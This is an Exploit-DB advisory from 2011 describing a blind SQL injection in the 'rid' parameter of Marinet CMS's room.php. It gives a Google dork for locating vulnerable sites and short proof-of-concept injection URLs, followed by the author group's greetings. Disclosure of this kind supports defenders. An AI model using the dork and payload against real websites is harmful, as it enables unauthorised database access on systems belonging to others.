Marinet CMS - 'room.php' Blind SQL Injection

EDB-ID:

17909

CVE:





Platform:

PHP

Date:

2011-09-30


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

====================================================
MARINET CMS (room.php) <= Blind SQL Vulnerability
====================================================
 
 
# Exploit Title: MARINET CMS (room.php) <= Blind SQL Vulnerability
# Date: 30 - 09 - 2011
# Author: BHG Security Center
# Software Link: http://www.marinet.gr/
# Contact : http://black-hg.org
# Version: Final
# Google dork: inurl:room.php?rid=1 "POWERED BY MARINET"
# Tested on: Linux
 
[*] ## ExPLo!T:
 
 
http://localhost/room.php?rid=[SQL]

http://localhost/room.php?rid=1+and+1=0--

=================================**BHG Security 
Center**==================================|
# Greets To 
:                                                                             |
  Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn 
~ cmaxx  |
  M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , Immortal Boy ~ 
farbodmahini ~ xb0y |
==========================================================================================|